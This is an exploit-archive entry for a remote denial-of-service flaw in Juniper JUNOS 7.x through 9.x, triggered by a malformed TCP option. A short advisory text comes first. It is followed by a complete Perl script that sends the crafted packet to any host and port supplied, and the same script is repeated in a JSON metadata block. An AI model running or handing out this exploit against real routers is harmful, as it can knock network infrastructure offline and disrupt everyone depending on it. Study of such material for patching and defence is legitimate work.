Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service Multiple Vulnerabilities
2010-01-07T00:00:00
ID EXPLOITPACK:975227BDF57516378817D9E615FFB0CE Type exploitpack Reporter anonymous Modified 2010-01-07T00:00:00
Description
Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/37670/info
JUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets.
JUNOS is also prone to six other unspecified security vulnerabilities. These issues may include privilege-escalation or denial-of-service issues.
JUNOS 7.x, 8.x, and 9.x are affected. JUNOS 10.x is not believed to be affected.
#!/usr/bin/perl
my $host = shift;
my $port = shift;
use Net::Packet qw($Env);
use Net::Packet::IPv4;
my $ip = Net::Packet::IPv4->new(dst => $host);
use Net::Packet::TCP;
my $tcp = Net::Packet::TCP->new(
dst => $port,
options => "\x65\x02\x01\x01",
);
use Net::Packet::Frame;
my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);
$frame->send;
exit 0;
{"lastseen": "2020-04-01T19:04:24", "references": [], "description": "\nJuniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service Multiple Vulnerabilities", "edition": 1, "reporter": "anonymous", "exploitpack": {"type": "dos", "platform": "hardware"}, "published": "2010-01-07T00:00:00", "title": "Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:24", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-04-01T19:04:24", "rev": 2}, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-01-07T00:00:00", "id": "EXPLOITPACK:975227BDF57516378817D9E615FFB0CE", "href": "", "viewCount": 1, "sourceData": "source: https://www.securityfocus.com/bid/37670/info\n\nJUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets.\n\nJUNOS is also prone to six other unspecified security vulnerabilities. These issues may include privilege-escalation or denial-of-service issues.\n\nJUNOS 7.x, 8.x, and 9.x are affected. JUNOS 10.x is not believed to be affected. \n\n#!/usr/bin/perl\n\nmy $host = shift;\nmy $port = shift;\n\nuse Net::Packet qw($Env);\n\nuse Net::Packet::IPv4;\nmy $ip = Net::Packet::IPv4->new(dst => $host);\n\nuse Net::Packet::TCP;\n\nmy $tcp = Net::Packet::TCP->new(\n dst => $port,\n options => \"\\x65\\x02\\x01\\x01\", \n );\n\nuse Net::Packet::Frame;\nmy $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);\n\n$frame->send;\nexit 0;", "cvss": {"score": 0.0, "vector": "NONE"}}